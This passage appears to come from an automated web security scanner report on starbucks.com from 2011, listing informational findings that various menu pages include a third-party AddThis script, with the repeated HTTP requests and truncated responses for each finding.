GET /menu/food/fruit-and-snack-plates/chicken-and-hummus-snack-plate HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:55:07 GMT
Connection: close
Content-Length: 41786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.232. http://www.starbucks.com/menu/food/fruit-and-snack-plates/fruit-and-cheese-plate  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/fruit-and-snack-plates/fruit-and-cheese-plate

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/fruit-and-snack-plates/fruit-and-cheese-plate HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:55:20 GMT
Connection: close
Content-Length: 41517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.233. http://www.starbucks.com/menu/food/fruit-and-snack-plates/protein-plate  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/fruit-and-snack-plates/protein-plate

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/fruit-and-snack-plates/protein-plate HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:55:21 GMT
Connection: close
Content-Length: 41880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.234. http://www.starbucks.com/menu/food/hot-breakfast/bacon-parmesan-frittata-and-gouda-on-an-artisan-roll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/bacon-parmesan-frittata-and-gouda-on-an-artisan-roll

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/hot-breakfast/bacon-parmesan-frittata-and-gouda-on-an-artisan-roll HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:41:45 GMT
Connection: close
Content-Length: 42323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.235. http://www.starbucks.com/menu/food/hot-breakfast/egg-white-spinach-and-feta-wrap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/egg-white-spinach-and-feta-wrap

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/hot-breakfast/egg-white-spinach-and-feta-wrap HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:42:26 GMT
Connection: close
Content-Length: 42853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.236. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-brown-sugar  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/oatmeal-brown-sugar

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/hot-breakfast/oatmeal-brown-sugar HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:42:05 GMT
Connection: close
Content-Length: 40891

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.237. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-dried-fruit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/oatmeal-dried-fruit

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/hot-breakfast/oatmeal-dried-fruit HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:42:10 GMT
Connection: close
Content-Length: 41120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.238. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-mixed-nuts  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/oatmeal-mixed-nuts

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/hot-breakfast/oatmeal-mixed-nuts HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:42:32 GMT
Connection: close
Content-Length: 40964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.239. http://www.starbucks.com/menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:41:32 GMT
Connection: close
Content-Length: 42765

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.240. http://www.starbucks.com/menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:41:29 GMT
Connection: close
Content-Length: 42228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.241. http://www.starbucks.com/menu/food/hot-breakfast/starbucks-perfect-oatmeal  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/starbucks-perfect-oatmeal

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/hot-breakfast/starbucks-perfect-oatmeal HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:42:30 GMT
Connection: close
Content-Length: 41654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.242. http://www.starbucks.com/menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:41:16 GMT
Connection: close
Content-Length: 42356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.243. http://www.starbucks.com/menu/food/ice-cream/caramel-macchiato-ice-cream  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/caramel-macchiato-ice-cream

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/ice-cream/caramel-macchiato-ice-cream HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:58:31 GMT
Connection: close
Content-Length: 38715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.244. http://www.starbucks.com/menu/food/ice-cream/coffee-ice-cream  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/coffee-ice-cream

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/ice-cream/coffee-ice-cream HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:00:42 GMT
Connection: close
Content-Length: 38508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.245. http://www.starbucks.com/menu/food/ice-cream/java-chip-frappuccino-ice-cream  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/java-chip-frappuccino-ice-cream

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/ice-cream/java-chip-frappuccino-ice-cream HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:00:42 GMT
Connection: close
Content-Length: 38726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.246. http://www.starbucks.com/menu/food/ice-cream/mocha-frappuccino-ice-cream  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/mocha-frappuccino-ice-cream

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/ice-cream/mocha-frappuccino-ice-cream HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:01:01 GMT
Connection: close
Content-Length: 38642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.247. http://www.starbucks.com/menu/food/ice-cream/peppermint-mocha-ice-cream  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/peppermint-mocha-ice-cream

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/ice-cream/peppermint-mocha-ice-cream HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:01:50 GMT
Connection: close
Content-Length: 38633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.248. http://www.starbucks.com/menu/food/ice-cream/signature-hot-chocolate-ice-cream  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/signature-hot-chocolate-ice-cream

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/ice-cream/signature-hot-chocolate-ice-cream HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:01:49 GMT
Connection: close
Content-Length: 38774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.249. http://www.starbucks.com/menu/food/ice-cream/strawberries-and-creme-frappuccino-ice-cream  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/strawberries-and-creme-frappuccino-ice-cream

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/ice-cream/strawberries-and-creme-frappuccino-ice-cream HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:02:15 GMT
Connection: close
Content-Length: 38913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.250. http://www.starbucks.com/menu/food/ice-cream/vanilla-bean-frappuccino-ice-cream  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/vanilla-bean-frappuccino-ice-cream

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/ice-cream/vanilla-bean-frappuccino-ice-cream HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
